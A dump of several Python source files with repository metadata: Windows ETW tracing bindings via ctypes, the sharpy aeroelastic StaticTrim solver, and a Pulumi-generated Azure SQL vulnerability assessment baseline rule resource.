EVENT_TRACE_FLAG_FILE_IO_INIT = 0x04000000
DEFAULT_NT_KERNEL_LOGGER_FLAGS = (EVENT_TRACE_FLAG_PROCESS |
EVENT_TRACE_FLAG_THREAD |
EVENT_TRACE_FLAG_DISK_IO |
EVENT_TRACE_FLAG_NETWORK_TCPIP)
# Remarkably, TRACEHANDLE is not typedef'd to a HANDLE, but, in fact, to a UINT64
TRACEHANDLE = ct.c_ulonglong
INVALID_PROCESSTRACE_HANDLE = TRACEHANDLE(-1)
# TRACE_LEVEL flags
TRACE_LEVEL_NONE = 0 # Tracing is not on
TRACE_LEVEL_CRITICAL = 1 # Abnormal exit or termination
TRACE_LEVEL_ERROR = 2 # Severe errors that need logging
TRACE_LEVEL_WARNING = 3 # Warnings such as allocation failure
TRACE_LEVEL_INFORMATION = 4 # Includes non-error cases(e.g.,Entry-Exit)
TRACE_LEVEL_VERBOSE = 5 # Detailed traces from intermediate steps
TRACE_LEVEL_RESERVED6 = 6
TRACE_LEVEL_RESERVED7 = 7
TRACE_LEVEL_RESERVED8 = 8
TRACE_LEVEL_RESERVED9 = 9
# EVENT_CONTROL flags
EVENT_CONTROL_CODE_DISABLE_PROVIDER = 0
EVENT_CONTROL_CODE_ENABLE_PROVIDER = 1
EVENT_CONTROL_CODE_CAPTURE_STATE = 2
# ControlTrace Codes
EVENT_TRACE_CONTROL_QUERY = 0
EVENT_TRACE_CONTROL_STOP = 1
EVENT_TRACE_CONTROL_UPDATE = 2
# Logger Mode flags
EVENT_TRACE_FILE_MODE_NONE = 0x00000000 # Logfile is off
EVENT_TRACE_FILE_MODE_SEQUENTIAL = 0x00000001 # Log sequentially
EVENT_TRACE_FILE_MODE_CIRCULAR = 0x00000002 # Log in circular manner
EVENT_TRACE_FILE_MODE_APPEND = 0x00000004 # Append sequential log
EVENT_TRACE_REAL_TIME_MODE = 0x00000100 # Real time mode on
EVENT_TRACE_DELAY_OPEN_FILE_MODE = 0x00000200 # Delay opening file
EVENT_TRACE_BUFFERING_MODE = 0x00000400 # Buffering mode only
EVENT_TRACE_PRIVATE_LOGGER_MODE = 0x00000800 # Process Private Logger
EVENT_TRACE_ADD_HEADER_MODE = 0x00001000 # Add a logfile header
EVENT_TRACE_USE_GLOBAL_SEQUENCE = 0x00004000 # Use global sequence no.
EVENT_TRACE_USE_LOCAL_SEQUENCE = 0x00008000 # Use local sequence no.
EVENT_TRACE_RELOG_MODE = 0x00010000 # Relogger
EVENT_TRACE_USE_PAGED_MEMORY = 0x01000000 # Use pageable buffers
# Logger Mode flags on XP and above
EVENT_TRACE_FILE_MODE_NEWFILE = 0x00000008 # Auto-switch log file
EVENT_TRACE_FILE_MODE_PREALLOCATE = 0x00000020 # Pre-allocate mode
# Logger Mode flags on Vista and above
EVENT_TRACE_NONSTOPPABLE_MODE = 0x00000040 # Session cannot be stopped (Autologger only)
EVENT_TRACE_SECURE_MODE = 0x00000080 # Secure session
EVENT_TRACE_USE_KBYTES_FOR_SIZE = 0x00002000 # Use KBytes as file size unit
EVENT_TRACE_PRIVATE_IN_PROC = 0x00020000 # In process private logger
EVENT_TRACE_MODE_RESERVED = 0x00100000 # Reserved bit, used to signal Heap/Critsec tracing
# Logger Mode flags on Win7 and above
EVENT_TRACE_NO_PER_PROCESSOR_BUFFERING = 0x10000000 # Use this for low frequency sessions.
# Logger Mode flags on Win8 and above
EVENT_TRACE_SYSTEM_LOGGER_MODE = 0x02000000 # Receive events from SystemTraceProvider
EVENT_TRACE_ADDTO_TRIAGE_DUMP = 0x80000000 # Add ETW buffers to triage dumps
EVENT_TRACE_STOP_ON_HYBRID_SHUTDOWN = 0x00400000 # Stop on hybrid shutdown
EVENT_TRACE_PERSIST_ON_HYBRID_SHUTDOWN = 0x00800000 # Persist on hybrid shutdown
# Logger Mode flags on Blue and above
EVENT_TRACE_INDEPENDENT_SESSION_MODE = 0x08000000 # Independent logger session
class ENABLE_TRACE_PARAMETERS(ct.Structure):
_fields_ = [('Version', ct.c_ulong),
('EnableProperty', ct.c_ulong),
('ControlFlags', ct.c_ulong),
('SourceId', GUID),
('EnableFilterDesc', ct.POINTER(ep.EVENT_FILTER_DESCRIPTOR)),
('FilterDescCount', ct.c_ulong)]
class EVENT_TRACE_PROPERTIES(ct.Structure):
_fields_ = [('Wnode', WNODE_HEADER),
('BufferSize', ct.c_ulong),
('MinimumBuffers', ct.c_ulong),
('MaximumBuffers', ct.c_ulong),
('MaximumFileSize', ct.c_ulong),
('LogFileMode', ct.c_ulong),
('FlushTimer', ct.c_ulong),
('EnableFlags', ct.c_ulong),
('AgeLimit', ct.c_ulong),
('NumberOfBuffers', ct.c_ulong),
('FreeBuffers', ct.c_ulong),
('EventsLost', ct.c_ulong),
('BuffersWritten', ct.c_ulong),
('LogBuffersLost', ct.c_ulong),
('RealTimeBuffersLost', ct.c_ulong),
('LoggerThreadId', wt.HANDLE),
('LogFileNameOffset', ct.c_ulong),
('LoggerNameOffset', ct.c_ulong)]
# This is a structure defined in a union within EVENT_TRACE_HEADER
class EVENT_TRACE_HEADER_CLASS(ct.Structure):
_fields_ = [('Type', ct.c_ubyte),
('Level', ct.c_ubyte),
('Version', ct.c_uint16)]
class EVENT_TRACE_HEADER(ct.Structure):
_fields_ = [('Size', ct.c_ushort),
('HeaderType', ct.c_ubyte),
('MarkerFlags', ct.c_ubyte),
('Class', EVENT_TRACE_HEADER_CLASS),
('ThreadId', ct.c_ulong),
('ProcessId', ct.c_ulong),
('TimeStamp', wt.LARGE_INTEGER),
('Guid', GUID),
('ClientContext', ct.c_ulong),
('Flags', ct.c_ulong)]
class EVENT_TRACE(ct.Structure):
_fields_ = [('Header', EVENT_TRACE_HEADER),
('InstanceId', ct.c_ulong),
('ParentInstanceId', ct.c_ulong),
('ParentGuid', GUID),
('MofData', ct.c_void_p),
('MofLength', ct.c_ulong),
('ClientContext', ct.c_ulong)]
class TRACE_LOGFILE_HEADER(ct.Structure):
_fields_ = [('BufferSize', ct.c_ulong),
('MajorVersion', ct.c_byte),
('MinorVersion', ct.c_byte),
('SubVersion', ct.c_byte),
('SubMinorVersion', ct.c_byte),
('ProviderVersion', ct.c_ulong),
('NumberOfProcessors', ct.c_ulong),
('EndTime', wt.LARGE_INTEGER),
('TimerResolution', ct.c_ulong),
('MaximumFileSize', ct.c_ulong),
('LogFileMode', ct.c_ulong),
('BuffersWritten', ct.c_ulong),
('StartBuffers', ct.c_ulong),
('PointerSize', ct.c_ulong),
('EventsLost', ct.c_ulong),
('CpuSpeedInMHz', ct.c_ulong),
('LoggerName', ct.c_wchar_p),
('LogFileName', ct.c_wchar_p),
('TimeZone', TIME_ZONE_INFORMATION),
('BootTime', wt.LARGE_INTEGER),
('PerfFreq', wt.LARGE_INTEGER),
('StartTime', wt.LARGE_INTEGER),
('ReservedFlags', ct.c_ulong),
('BuffersLost', ct.c_ulong)]
# This must be "forward declared", because of the callback type below,
# which is contained in the ct.Structure.
class EVENT_TRACE_LOGFILE(ct.Structure):
pass
# The type for event trace callbacks.
EVENT_RECORD_CALLBACK = ct.WINFUNCTYPE(None, ct.POINTER(ec.EVENT_RECORD))
EVENT_TRACE_BUFFER_CALLBACK = ct.WINFUNCTYPE(ct.c_ulong,
ct.POINTER(EVENT_TRACE_LOGFILE))
EVENT_TRACE_LOGFILE._fields_ = [
('LogFileName', ct.c_wchar_p),
('LoggerName', ct.c_wchar_p),
('CurrentTime', ct.c_longlong),
('BuffersRead', ct.c_ulong),
('ProcessTraceMode', ct.c_ulong),
('CurrentEvent', EVENT_TRACE),
('LogfileHeader', TRACE_LOGFILE_HEADER),
('BufferCallback', EVENT_TRACE_BUFFER_CALLBACK),
('BufferSize', ct.c_ulong),
('Filled', ct.c_ulong),
('EventsLost', ct.c_ulong),
('EventRecordCallback', EVENT_RECORD_CALLBACK),
('IsKernelTrace', ct.c_ulong),
('Context', ct.c_void_p)]
# Function Definitions
StartTraceW = ct.windll.advapi32.StartTraceW
StartTraceW.argtypes = [ct.POINTER(TRACEHANDLE),
ct.c_wchar_p,
ct.POINTER(EVENT_TRACE_PROPERTIES)]
StartTraceW.restype = ct.c_ulong
ControlTraceW = ct.windll.advapi32.ControlTraceW
ControlTraceW.argtypes = [TRACEHANDLE,
ct.c_wchar_p,
ct.POINTER(EVENT_TRACE_PROPERTIES),
ct.c_ulong]
ControlTraceW.restype = ct.c_ulong
# TODO: Ensure we are using the correct library based on the version of Windows.
EnableTraceEx2 = ct.windll.advapi32.EnableTraceEx2
EnableTraceEx2.argtypes = [TRACEHANDLE,
ct.POINTER(GUID),
ct.c_ulong,
ct.c_char,
ct.c_ulonglong,
ct.c_ulonglong,
ct.c_ulong,
ct.POINTER(ENABLE_TRACE_PARAMETERS)]
EnableTraceEx2.restype = ct.c_ulong
OpenTraceW = ct.windll.advapi32.OpenTraceW
OpenTraceW.argtypes = [ct.POINTER(EVENT_TRACE_LOGFILE)]
OpenTraceW.restype = TRACEHANDLE
ProcessTrace = ct.windll.advapi32.ProcessTrace
ProcessTrace.argtypes = [ct.POINTER(TRACEHANDLE),
ct.c_ulong,
ct.POINTER(wt.FILETIME),
ct.POINTER(wt.FILETIME)]
ProcessTrace.restype = ct.c_ulong
CloseTrace = ct.windll.advapi32.CloseTrace
CloseTrace.argtypes = [TRACEHANDLE]
CloseTrace.restype = ct.c_ulong
ConvertSidToStringSidW = ct.windll.advapi32.ConvertSidToStringSidW
ConvertSidToStringSidW.argtypes = [ct.c_void_p, ct.POINTER(wt.LPWSTR)]
ConvertSidToStringSidW.restype = wt.BOOL
LocalFree = ct.windll.kernel32.LocalFree
|
39b88c7152e737482fc1cb23a932a1f92ef49d6e
|
26060f5ea4d7efee2d03cbbd0b49c099e0f5f38a
|
/sharpy/solvers/statictrim.py
|
a76947edf9771d55097c6c677e14ecfdf24614a2
|
[
"BSD-3-Clause"
] |
permissive
|
ImperialCollegeLondon/sharpy
|
0fcd1fba9ed2181dabc1124f9800aa75521bfc3d
|
58ddceb985bef13af3ea199a1764c8dc9b088907
|
refs/heads/main
| 2023-08-19T03:04:26.044857
| 2023-07-17T07:05:06
| 2023-07-17T07:05:06
| 70,235,936
| 106
| 55
|
BSD-3-Clause
| 2023-08-16T02:27:58
| 2016-10-07T10:11:51
|
Python
|
UTF-8
|
Python
| false
| false
| 16,991
|
py
|
statictrim.py
|
import numpy as np
import sharpy.utils.cout_utils as cout
import sharpy.utils.solver_interface as solver_interface
from sharpy.utils.solver_interface import solver, BaseSolver
import sharpy.utils.settings as settings_utils
import os
@solver
class StaticTrim(BaseSolver):
"""
The ``StaticTrim`` solver determines the longitudinal state of trim (equilibrium) for an aeroelastic system in
static conditions. It wraps around the desired solver to yield the state of trim of the system, in most cases
the :class:`~sharpy.solvers.staticcoupled.StaticCoupled` solver.
It calculates the required angle of attack, elevator deflection and thrust required to achieve longitudinal
equilibrium. The output angles are shown in degrees.
The results from the trimming iteration can be saved to a text file by using the `save_info` option.
"""
solver_id = 'StaticTrim'
solver_classification = 'Flight Dynamics'
settings_types = dict()
settings_default = dict()
settings_description = dict()
settings_types['print_info'] = 'bool'
settings_default['print_info'] = True
settings_description['print_info'] = 'Print info to screen'
settings_types['solver'] = 'str'
settings_default['solver'] = ''
settings_description['solver'] = 'Solver to run in trim routine'
settings_types['solver_settings'] = 'dict'
settings_default['solver_settings'] = dict()
settings_description['solver_settings'] = 'Solver settings dictionary'
settings_types['max_iter'] = 'int'
settings_default['max_iter'] = 100
settings_description['max_iter'] = 'Maximum number of iterations of trim routine'
settings_types['fz_tolerance'] = 'float'
settings_default['fz_tolerance'] = 0.01
settings_description['fz_tolerance'] = 'Tolerance in vertical force'
settings_types['fx_tolerance'] = 'float'
settings_default['fx_tolerance'] = 0.01
settings_description['fx_tolerance'] = 'Tolerance in horizontal force'
settings_types['m_tolerance'] = 'float'
settings_default['m_tolerance'] = 0.01
settings_description['m_tolerance'] = 'Tolerance in pitching moment'
settings_types['tail_cs_index'] = ['int', 'list(int)']
settings_default['tail_cs_index'] = 0
settings_description['tail_cs_index'] = 'Index of control surfaces that move to achieve trim'
settings_types['thrust_nodes'] = 'list(int)'
settings_default['thrust_nodes'] = [0]
settings_description['thrust_nodes'] = 'Nodes at which thrust is applied'
settings_types['initial_alpha'] = 'float'
settings_default['initial_alpha'] = 0.
settings_description['initial_alpha'] = 'Initial angle of attack'
settings_types['initial_deflection'] = 'float'
settings_default['initial_deflection'] = 0.
settings_description['initial_deflection'] = 'Initial control surface deflection'
settings_types['initial_thrust'] = 'float'
settings_default['initial_thrust'] = 0.0
settings_description['initial_thrust'] = 'Initial thrust setting'
settings_types['initial_angle_eps'] = 'float'
settings_default['initial_angle_eps'] = 0.05
settings_description['initial_angle_eps'] = 'Initial change of control surface deflection'
settings_types['initial_thrust_eps'] = 'float'
settings_default['initial_thrust_eps'] = 2.
settings_description['initial_thrust_eps'] = 'Initial thrust setting change'
settings_types['relaxation_factor'] = 'float'
settings_default['relaxation_factor'] = 0.2
settings_description['relaxation_factor'] = 'Relaxation factor'
settings_types['save_info'] = 'bool'
settings_default['save_info'] = False
settings_description['save_info'] = 'Save trim results to text file'
settings_table = settings_utils.SettingsTable()
__doc__ += settings_table.generate(settings_types, settings_default, settings_description)
def __init__(self):
self.data = None
self.settings = None
self.solver = None
# The order is
# [0]: alpha/fz
# [1]: alpha + delta (gamma)/moment
# [2]: thrust/fx
self.n_input = 3
self.i_iter = 0
self.input_history = []
self.output_history = []
self.gradient_history = []
self.trimmed_values = np.zeros((3,))
self.table = None
self.folder = None
def initialise(self, data, restart=False):
self.data = data
self.settings = data.settings[self.solver_id]
settings_utils.to_custom_types(self.settings, self.settings_types, self.settings_default)
self.solver = solver_interface.initialise_solver(self.settings['solver'])
self.solver.initialise(self.data, self.settings['solver_settings'], restart=restart)
self.folder = data.output_folder + '/statictrim/'
if not os.path.exists(self.folder):
os.makedirs(self.folder)
self.table = cout.TablePrinter(10, 8, ['g', 'f', 'f', 'f', 'f', 'f', 'f', 'f', 'f', 'f'],
filename=self.folder+'trim_iterations.txt')
self.table.print_header(['iter', 'alpha[deg]', 'elev[deg]', 'thrust', 'Fx', 'Fy', 'Fz', 'Mx', 'My', 'Mz'])
def increase_ts(self):
self.data.ts += 1
self.structural_solver.next_step()
self.aero_solver.next_step()
def run(self, **kwargs):
# In the event the modal solver has been run prior to StaticCoupled (i.e. to get undeformed modes), copy
# results and then attach to the resulting timestep
try:
modal = self.data.structure.timestep_info[-1].modal.copy()
modal_exists = True
except AttributeError:
modal_exists = False
self.trim_algorithm()
if modal_exists:
self.data.structure.timestep_info[-1].modal = modal
if self.settings['save_info']:
np.savetxt(self.folder + '/trim_values.txt', self.trimmed_values)
return self.data
def convergence(self, fz, m, fx):
return_value = np.array([False, False, False])
if np.abs(fz) < self.settings['fz_tolerance']:
return_value[0] = True
if np.abs(m) < self.settings['m_tolerance']:
return_value[1] = True
if np.abs(fx) < self.settings['fx_tolerance']:
return_value[2] = True
return return_value
def trim_algorithm(self):
"""
Trim algorithm method
The trim condition is found iteratively.
Returns:
np.array: array of trim values for angle of attack, control surface deflection and thrust.
"""
for self.i_iter in range(self.settings['max_iter'] + 1):
if self.i_iter == self.settings['max_iter']:
raise Exception('The Trim routine reached max iterations without convergence!')
self.input_history.append([])
self.output_history.append([])
self.gradient_history.append([])
for i in range(self.n_input):
self.input_history[self.i_iter].append(0)
self.output_history[self.i_iter].append(0)
self.gradient_history[self.i_iter].append(0)
# the first iteration requires computing gradients
if not self.i_iter:
# add to input history the initial estimation
self.input_history[self.i_iter][0] = self.settings['initial_alpha']
self.input_history[self.i_iter][1] = (self.settings['initial_deflection'] +
self.settings['initial_alpha'])
self.input_history[self.i_iter][2] = self.settings['initial_thrust']
# compute output
(self.output_history[self.i_iter][0],
self.output_history[self.i_iter][1],
self.output_history[self.i_iter][2]) = self.evaluate(self.input_history[self.i_iter][0],
self.input_history[self.i_iter][1],
self.input_history[self.i_iter][2])
# check for convergence (in case initial values are ok)
if all(self.convergence(self.output_history[self.i_iter][0],
self.output_history[self.i_iter][1],
self.output_history[self.i_iter][2])):
self.trimmed_values = self.input_history[self.i_iter]
return
# compute gradients
# dfz/dalpha
(l, m, d) = self.evaluate(self.input_history[self.i_iter][0] + self.settings['initial_angle_eps'],
self.input_history[self.i_iter][1],
self.input_history[self.i_iter][2])
self.gradient_history[self.i_iter][0] = ((l - self.output_history[self.i_iter][0]) /
self.settings['initial_angle_eps'])
# dm/dgamma
(l, m, d) = self.evaluate(self.input_history[self.i_iter][0],
self.input_history[self.i_iter][1] + self.settings['initial_angle_eps'],
self.input_history[self.i_iter][2])
self.gradient_history[self.i_iter][1] = ((m - self.output_history[self.i_iter][1]) /
self.settings['initial_angle_eps'])
# dfx/dthrust
(l, m, d) = self.evaluate(self.input_history[self.i_iter][0],
self.input_history[self.i_iter][1],
self.input_history[self.i_iter][2] +
self.settings['initial_thrust_eps'])
self.gradient_history[self.i_iter][2] = ((d - self.output_history[self.i_iter][2]) /
self.settings['initial_thrust_eps'])
continue
# if not all(np.isfinite(self.gradient_history[self.i_iter - 1]))
# now back to normal evaluation (not only the i_iter == 0 case)
# compute next alpha with the previous gradient
# convergence = self.convergence(self.output_history[self.i_iter - 1][0],
# self.output_history[self.i_iter - 1][1],
# self.output_history[self.i_iter - 1][2])
convergence = np.full((3, ), False)
if convergence[0]:
# fz is converged, don't change it
self.input_history[self.i_iter][0] = self.input_history[self.i_iter - 1][0]
self.gradient_history[self.i_iter][0] = self.gradient_history[self.i_iter - 1][0]
else:
self.input_history[self.i_iter][0] = (self.input_history[self.i_iter - 1][0] -
(self.output_history[self.i_iter - 1][0] /
self.gradient_history[self.i_iter - 1][0]))
if convergence[1]:
# m is converged, don't change it
self.input_history[self.i_iter][1] = self.input_history[self.i_iter - 1][1]
self.gradient_history[self.i_iter][1] = self.gradient_history[self.i_iter - 1][1]
else:
# compute next gamma with the previous gradient
self.input_history[self.i_iter][1] = (self.input_history[self.i_iter - 1][1] -
(self.output_history[self.i_iter - 1][1] /
self.gradient_history[self.i_iter - 1][1]))
if convergence[2]:
# fx is converged, don't change it
self.input_history[self.i_iter][2] = self.input_history[self.i_iter - 1][2]
self.gradient_history[self.i_iter][2] = self.gradient_history[self.i_iter - 1][2]
else:
# compute next gamma with the previous gradient
self.input_history[self.i_iter][2] = (self.input_history[self.i_iter - 1][2] -
(self.output_history[self.i_iter - 1][2] /
self.gradient_history[self.i_iter - 1][2]))
if self.settings['relaxation_factor']:
for i_dim in range(3):
self.input_history[self.i_iter][i_dim] = (self.input_history[self.i_iter][i_dim]*(1 - self.settings['relaxation_factor']) +
self.input_history[self.i_iter][i_dim]*self.settings['relaxation_factor'])
# evaluate
(self.output_history[self.i_iter][0],
self.output_history[self.i_iter][1],
self.output_history[self.i_iter][2]) = self.evaluate(self.input_history[self.i_iter][0],
self.input_history[self.i_iter][1],
self.input_history[self.i_iter][2])
if not convergence[0]:
self.gradient_history[self.i_iter][0] = ((self.output_history[self.i_iter][0] -
self.output_history[self.i_iter - 1][0]) /
(self.input_history[self.i_iter][0] -
self.input_history[self.i_iter - 1][0]))
if not convergence[1]:
self.gradient_history[self.i_iter][1] = ((self.output_history[self.i_iter][1] -
self.output_history[self.i_iter - 1][1]) /
(self.input_history[self.i_iter][1] -
self.input_history[self.i_iter - 1][1]))
if not convergence[2]:
self.gradient_history[self.i_iter][2] = ((self.output_history[self.i_iter][2] -
self.output_history[self.i_iter - 1][2]) /
(self.input_history[self.i_iter][2] -
self.input_history[self.i_iter - 1][2]))
# check convergence
convergence = self.convergence(self.output_history[self.i_iter][0],
self.output_history[self.i_iter][1],
self.output_history[self.i_iter][2])
if all(convergence):
self.trimmed_values = self.input_history[self.i_iter]
self.table.close_file()
return
def evaluate(self, alpha, deflection_gamma, thrust):
if not np.isfinite(alpha):
import pdb; pdb.set_trace()
if not np.isfinite(deflection_gamma):
import pdb; pdb.set_trace()
if not np.isfinite(thrust):
import pdb; pdb.set_trace()
# cout.cout_wrap('--', 2)
# cout.cout_wrap('Trying trim: ', 2)
# cout.cout_wrap('Alpha: ' + str(alpha*180/np.pi), 2)
# cout.cout_wrap('CS deflection: ' + str((deflection_gamma - alpha)*180/np.pi), 2)
# cout.cout_wrap('Thrust: ' + str(thrust), 2)
# modify the trim in the static_coupled solver
self.solver.change_trim(alpha,
thrust,
self.settings['thrust_nodes'],
deflection_gamma - alpha,
self.settings['tail_cs_index'])
# run the solver
self.solver.run()
# extract resultants
forces, moments = self.solver.extract_resultants()
forcez = forces[2]
forcex = forces[0]
moment = moments[1]
# cout.cout_wrap('Forces and moments:', 2)
# cout.cout_wrap('fx = ' + str(forces[0]) + ' mx = ' + str(moments[0]), 2)
# cout.cout_wrap('fy = ' + str(forces[1]) + ' my = ' + str(moments[1]), 2)
# cout.cout_wrap('fz = ' + str(forces[2]) + ' mz = ' + str(moments[2]), 2)
self.table.print_line([self.i_iter,
alpha*180/np.pi,
(deflection_gamma - alpha)*180/np.pi,
thrust,
forces[0],
forces[1],
forces[2],
moments[0],
moments[1],
moments[2]])
return forcez, moment, forcex
|
81d3fc3ff61dad36d8a97238c170bf9f248df56a
|
b049a961f100444dde14599bab06a0a4224d869b
|
/sdk/python/pulumi_azure_native/security/v20230201preview/sql_vulnerability_assessment_baseline_rule.py
|
0892c1e7cb9c71c0f290a61419df077c339903f6
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-azure-native
|
b390c88beef8381f9a71ab2bed5571e0dd848e65
|
4c499abe17ec6696ce28477dde1157372896364e
|
refs/heads/master
| 2023-08-30T08:19:41.564780
| 2023-08-28T19:29:04
| 2023-08-28T19:29:04
| 172,386,632
| 107
| 29
|
Apache-2.0
| 2023-09-14T13:17:00
| 2019-02-24T20:30:21
|
Python
|
UTF-8
|
Python
| false
| false
| 9,830
|
py
|
sql_vulnerability_assessment_baseline_rule.py
|
# coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = ['SqlVulnerabilityAssessmentBaselineRuleArgs', 'SqlVulnerabilityAssessmentBaselineRule']
@pulumi.input_type
class SqlVulnerabilityAssessmentBaselineRuleArgs:
def __init__(__self__, *,
resource_id: pulumi.Input[str],
workspace_id: pulumi.Input[str],
latest_scan: Optional[pulumi.Input[bool]] = None,
results: Optional[pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]]] = None,
rule_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a SqlVulnerabilityAssessmentBaselineRule resource.
:param pulumi.Input[str] resource_id: The identifier of the resource.
:param pulumi.Input[str] workspace_id: The workspace Id.
:param pulumi.Input[bool] latest_scan: Take results from latest scan.
:param pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]] results: Expected results to be inserted into the baseline.
Leave this field empty it LatestScan == true.
:param pulumi.Input[str] rule_id: The rule Id.
"""
pulumi.set(__self__, "resource_id", resource_id)
pulumi.set(__self__, "workspace_id", workspace_id)
if latest_scan is not None:
pulumi.set(__self__, "latest_scan", latest_scan)
if results is not None:
pulumi.set(__self__, "results", results)
if rule_id is not None:
pulumi.set(__self__, "rule_id", rule_id)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Input[str]:
"""
The identifier of the resource.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_id", value)
@property
@pulumi.getter(name="workspaceId")
def workspace_id(self) -> pulumi.Input[str]:
"""
The workspace Id.
"""
return pulumi.get(self, "workspace_id")
@workspace_id.setter
def workspace_id(self, value: pulumi.Input[str]):
pulumi.set(self, "workspace_id", value)
@property
@pulumi.getter(name="latestScan")
def latest_scan(self) -> Optional[pulumi.Input[bool]]:
"""
Take results from latest scan.
"""
return pulumi.get(self, "latest_scan")
@latest_scan.setter
def latest_scan(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "latest_scan", value)
@property
@pulumi.getter
def results(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]]]:
"""
Expected results to be inserted into the baseline.
Leave this field empty it LatestScan == true.
"""
return pulumi.get(self, "results")
@results.setter
def results(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]]]):
pulumi.set(self, "results", value)
@property
@pulumi.getter(name="ruleId")
def rule_id(self) -> Optional[pulumi.Input[str]]:
"""
The rule Id.
"""
return pulumi.get(self, "rule_id")
@rule_id.setter
def rule_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule_id", value)
class SqlVulnerabilityAssessmentBaselineRule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
latest_scan: Optional[pulumi.Input[bool]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
results: Optional[pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]]] = None,
rule_id: Optional[pulumi.Input[str]] = None,
workspace_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Rule results.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] latest_scan: Take results from latest scan.
:param pulumi.Input[str] resource_id: The identifier of the resource.
:param pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]] results: Expected results to be inserted into the baseline.
Leave this field empty it LatestScan == true.
:param pulumi.Input[str] rule_id: The rule Id.
:param pulumi.Input[str] workspace_id: The workspace Id.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SqlVulnerabilityAssessmentBaselineRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Rule results.
:param str resource_name: The name of the resource.
:param SqlVulnerabilityAssessmentBaselineRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SqlVulnerabilityAssessmentBaselineRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
latest_scan: Optional[pulumi.Input[bool]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
results: Optional[pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]]] = None,
rule_id: Optional[pulumi.Input[str]] = None,
workspace_id: Optional[pulumi.Input[str]] = None,
__props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SqlVulnerabilityAssessmentBaselineRuleArgs.__new__(SqlVulnerabilityAssessmentBaselineRuleArgs)
__props__.__dict__["latest_scan"] = latest_scan
if resource_id is None and not opts.urn:
raise TypeError("Missing required property 'resource_id'")
__props__.__dict__["resource_id"] = resource_id
__props__.__dict__["results"] = results
__props__.__dict__["rule_id"] = rule_id
if workspace_id is None and not opts.urn:
raise TypeError("Missing required property 'workspace_id'")
__props__.__dict__["workspace_id"] = workspace_id
__props__.__dict__["name"] = None
__props__.__dict__["properties"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-native:security:SqlVulnerabilityAssessmentBaselineRule"), pulumi.Alias(type_="azure-native:security/v20200701preview:SqlVulnerabilityAssessmentBaselineRule")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SqlVulnerabilityAssessmentBaselineRule, __self__).__init__(
'azure-native:security/v20230201preview:SqlVulnerabilityAssessmentBaselineRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SqlVulnerabilityAssessmentBaselineRule':
"""
Get an existing SqlVulnerabilityAssessmentBaselineRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = SqlVulnerabilityAssessmentBaselineRuleArgs.__new__(SqlVulnerabilityAssessmentBaselineRuleArgs)
__props__.__dict__["name"] = None
__props__.__dict__["properties"] = None
__props__.__dict__["type"] = None
return SqlVulnerabilityAssessmentBaselineRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> pulumi.Output['outputs.RuleResultsPropertiesResponse']:
"""
Rule results properties.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
|
2229f0fec8c421471daccbb62ffc29af10af7364
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/third_party/blink/web_tests/external/wpt/network-error-logging/support/cached-with-validation.py
|
e5090e03929d96169791e6958c2a9a7d20f1aba6
|
[
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
